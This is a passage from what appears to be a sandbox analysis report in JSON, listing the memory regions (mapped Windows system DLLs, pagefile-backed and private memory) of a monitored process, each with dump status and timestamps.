1 }, "end_va": 1959104511, "entry_point": 1959073190, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4427", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1959067648, "timestamp": "00:01:33.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1959202815, "entry_point": 1959138048, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4428", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:01:33.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1959264256, "type": "region", "version": 1 }, "end_va": 1959317503, "entry_point": 1959268832, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4429", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959264256, "timestamp": "00:01:33.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1959329792, "type": "region", "version": 1 }, "end_va": 1959546879, "entry_point": 1959334869, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4430", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1959329792, "timestamp": "00:01:33.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4431", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:33.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4432", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:33.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4433", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:33.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4434", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:33.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4435", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:33.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4436", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:33.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4437", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:33.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4438", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:33.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4439", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:33.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4440", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:33.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4441", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:33.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4442", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:33.644", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4443", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:33.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4444", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:33.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4445", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:33.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4446", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:33.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4447", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:33.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4448", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:33.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4449", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:33.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4450", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:33.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 6258687, "entry_point": 0, "filename": null, "id": "region_4451", "name": "pagefile_0x0000000000470000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4653056, "timestamp": "00:01:33.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4452", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:33.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4453", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:33.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_4454", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:33.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_4455", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:33.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4456", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:33.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_4457", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:33.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_4458", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:33.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 1441792, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4459", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:01:33.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_4460", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:33.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_4461", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:01:33.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_4462", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:01:33.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7471104, "type": "region", "version": 1 }, "end_va": 7733247, "entry_point": 0, "filename": null, "id": "region_4463", "name": "private_0x0000000000720000", "norm_filename": null, "region_type": "private_memory", "start_va": 7471104, "timestamp": "00:01:33.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9240576, "type": "region", "version": 1 }, "end_va": 10817535, "entry_point": 0, "filename": null, "id": "region_4464", "name": "pagefile_0x00000000008d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9240576, "timestamp": "00:01:33.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11337728, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_4465", "name": "pagefile_0x0000000000ad0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11337728, "timestamp": "00:01:33.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4466", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:33.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4467", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:33.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2297855, "entry_point": 0, "filename": null, "id": "region_4468", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:01:33.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958920191, "entry_point": 1958685512, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4469", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:01:33.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1958977535, "entry_point": 1958941850, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4470", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:01:33.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_4471", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:01:33.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 33619967, "entry_point": 0, "filename": null, "id": "region_4472", "name": "private_0x0000000001fd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33357824, "timestamp": "00:01:33.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1958346752, "type": "region", "version": 1 }, "end_va": 1958514687, "entry_point": 1958374169, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4473", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1958346752, "timestamp": "00:01:33.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_4474", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:33.790", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 36564991, "entry_point": 33619968, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4475", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33619968, "timestamp": "00:01:33.790", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36765696, "type": "region", "version": 1 }, "end_va": 37027839, "entry_point": 0, "filename": null, "id": "region_4476", "name": "private_0x0000000002310000", "norm_filename": null, "region_type": "private_memory", "start_va": 36765696, "timestamp": "00:01:33.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4477", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:33.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4478", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:33.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4479", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:33.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4480", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:33.793", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 7143423, "entry_point": 0, "filename": null, "id": "region_4481", "name": "private_0x0000000000690000", "norm_filename": null, "region_type": "private_memory", "start_va": 6881280, "timestamp": "00:01:33.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11010048, "type": "region", "version": 1 }, "end_va": 11272191, "entry_point": 0, "filename": null, "id": "region_4482", "name": "private_0x0000000000a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 11010048, "timestamp": "00:01:33.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37027840, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_4483", "name": "private_0x0000000002350000", "norm_filename": null, "region_type": "private_memory", "start_va": 37027840, "timestamp": "00:01:33.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37289984, "type": "region", "version": 1 }, "end_va": 37552127, "entry_point": 0, "filename": null, "id": "region_4484", "name": "private_0x0000000002390000", "norm_filename": null, "region_type": "private_memory", "start_va": 37289984, "timestamp": "00:01:33.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958281216, "type": "region", "version": 1 }, "end_va": 1958342655, "entry_point": 1958289824, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4485", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1958281216, "timestamp": "00:01:33.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4486", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:33.880", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], 